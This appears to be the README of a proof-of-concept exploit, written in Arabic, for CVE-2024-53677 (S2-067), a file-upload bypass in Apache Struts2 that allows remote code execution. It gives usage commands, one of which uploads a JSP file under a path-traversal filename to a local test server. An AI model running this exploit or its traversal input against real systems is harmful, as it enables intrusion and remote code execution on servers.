
إثبات مفهوم لاستغلال CVE-2024-53677 (S2-067)، وهو تجاوز لمنطق رفع الملفات في Apache Struts2 يتيح تنفيذ الأكواد عن بُعد عبر معاملات اسم ملف مصمّمة خصيصًا.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
